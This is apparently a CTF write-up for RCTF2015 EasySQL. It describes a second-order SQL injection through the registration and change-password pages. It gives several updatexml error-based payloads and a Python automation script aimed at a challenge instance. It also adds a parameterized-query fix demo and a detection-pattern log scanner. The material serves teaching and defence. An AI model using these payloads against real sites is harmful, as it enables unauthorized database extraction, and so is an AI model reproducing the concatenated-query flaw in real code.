[RCTF2015] EasySQL challenge notes

[RCTF2015] EasySQL

  • EasySQL github

  • Open the target machine; the interface is as follows

  • On the registration page I tried it: the username and email fields have a filter, so I fuzzed directly to see which characters are banned

  • After successful registration there is a change-password function; the test point here should be second-order injection

  • Special characters are handled when the data is stored in the database, but the change-password code reads the username back out of the database without any processing

  • Registering the username 'sss"\ produces an error echo on the change-password page

  • So the SQL statement can be guessed to look something like select * from user where username="'sss"\" and password='d41d8cd98f00b204e9800998ecf8427e' (the hash is the md5 of the empty old password)
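The second-order pattern described above, as an added example that is not the challenge's own server code (which these notes never show): an SQLite stand-in for the users table (column names assumed), a safe parameterized registration path, the change-password query built by string concatenation the way the guessed statement suggests, and the same query with bound parameters. The challenge runs MySQL; SQLite is used here only so the example runs offline, and the probe username breaks the concatenated query in both engines.

```python
import hashlib
import sqlite3

# Constructed stand-in for the challenge's users table; column names are assumed.
SCHEMA = "CREATE TABLE users (username TEXT, password TEXT, email TEXT)"

# The probe username from the notes, which produced the error echo on the
# change-password page.
PROBE_USERNAME = "'sss\"\\"


def md5_hex(text: str) -> str:
    # The challenge stores MD5 hex digests; md5('') is d41d8cd98f00b204e9800998ecf8427e.
    return hashlib.md5(text.encode()).hexdigest()


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def register(conn, username, password, email):
    # The registration path is safe: the value is bound as a parameter and
    # stored verbatim, special characters included.
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 (username, md5_hex(password), email))
    conn.commit()


def build_vulnerable_query(username, old_password):
    # Second-order flaw: the username comes back out of the database (or the
    # session) and is trusted, so it is spliced into the SQL text unescaped.
    return ('SELECT * FROM users WHERE username="' + username
            + "\" AND password='" + md5_hex(old_password) + "'")


def change_password_vulnerable(conn, username, old_password):
    return conn.execute(build_vulnerable_query(username, old_password)).fetchall()


def change_password_fixed(conn, username, old_password):
    # Every value that reaches the query is bound, whether it came from the
    # request or from an earlier database read; data can never change the
    # statement's structure.
    return conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, md5_hex(old_password)),
    ).fetchall()


def demo():
    conn = new_db()
    register(conn, PROBE_USERNAME, "", "123")
    try:
        change_password_vulnerable(conn, PROBE_USERNAME, "")
        vulnerable_errored = False
    except sqlite3.OperationalError:
        # Same failure mode the notes saw: the stored name breaks the query,
        # and an application that echoes the database error turns this into
        # an error-based injection oracle.
        vulnerable_errored = True
    rows = change_password_fixed(conn, PROBE_USERNAME, "")
    return {"vulnerable_errored": vulnerable_errored, "fixed_rows": len(rows)}


if __name__ == "__main__":
    print(demo())
```

The fix is the bound parameters, not escaping on the way in: the registration code already escaped its input and the bug still existed, because the value was trusted once it came back out of the database. Not echoing raw database errors to the client removes the oracle as well.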

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

  • After testing, the flag is not in the flag table

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#

  • It turns out the output is length-limited

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

  • This is awkward: the output is truncated, so it is better to use reverse() and read the output reversed

  • username=peri0d"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('f'))),1))#
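A defender-side view of the same payloads, as an added example that is not part of these notes: a small classifier over registration log lines (the log format and the sample lines are constructed here) that flags usernames carrying the SQL function calls and schema probing seen in the payloads above, and gives a lower-severity review flag to names with unbalanced quotes or a backslash, since the probe from these notes looks like that but so does a legitimate O'Brien.

```python
import re

# Indicators taken from the payloads in these notes: function calls and
# schema probing that have no business in a field holding an account name.
INDICATORS = [re.compile(p, re.IGNORECASE) for p in (
    r"updatexml\s*\(",
    r"group_concat\s*\(",
    r"information_schema",
    r"\bregexp\s*\(",
    r"\|\|",
    r"#\s*$",
)]


def classify_username(name: str) -> str:
    """Return 'block', 'review' or 'ok' for a submitted username."""
    if any(p.search(name) for p in INDICATORS):
        return "block"
    # Odd number of quote characters or a stray backslash: the probe from
    # these notes looks like this, but so does O'Brien, so only flag for review.
    if name.count("'") % 2 or name.count('"') % 2 or "\\" in name:
        return "review"
    return "ok"


# Constructed sample log; the format is assumed, the usernames come from the notes.
SAMPLE_LOG = """\
2015-05-24 10:00:01 register username=alice email=a@example.test
2015-05-24 10:00:07 register username='sss"\\ email=123
2015-05-24 10:00:13 register username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))# email=123
2015-05-24 10:00:20 register username=O'Brien email=ob@example.test
"""

LINE_RE = re.compile(r"register username=(.*?) email=")


def scan_log(text: str):
    """Yield (username, verdict) for every registration line in the log."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            results.append((m.group(1), classify_username(m.group(1))))
    return results


if __name__ == "__main__":
    for name, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:7} {name}")
```

The point of the two tiers is that a quote or backslash alone is not evidence of an attack, only of input the application must handle safely; the function-call indicators are what a blocking rule can act on without breaking real names.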

  • Here is a script covering the whole process of this challenge; it also records my silliness

    import requests
    
    # Challenge instance URLs from the write-up.
    url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
    url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
    url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'
    
    # Prefix and suffix wrapped around each single-character regexp probe.
    pre = 'peri0d"'
    suf = "'))),1))#"
    
    # Characters tried one at a time as the regexp pattern.
    s = 'abcdefghijklmnopqrstuvwxyz1234567890'
    
    r = requests.session()
    
    def register(name):
        data = {
            'username' : name,
            'password' : '123',
            'email' : '123',
        }
        r.post(url=url_reg, data=data)
    
    def login(name):
        data = {
            'username' : name,
            'password' : '123',
        }
        r.post(url=url_log, data=data)
    
    def changepwd():
        # The stored username is read back on this page; when the normal
        # 'target' text is missing the response carries the error echo, so print it.
        data = {
            'oldpass' : '',
            'newpass' : '',
        }
        kk = r.post(url=url_change, data=data)
        if 'target' not in kk.text:
            print(kk.text)
    
    for i in s:
        payload = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
        register(payload)
        login(payload)
        changepwd()


Origin: www.cnblogs.com/peri0d/p/11599643.html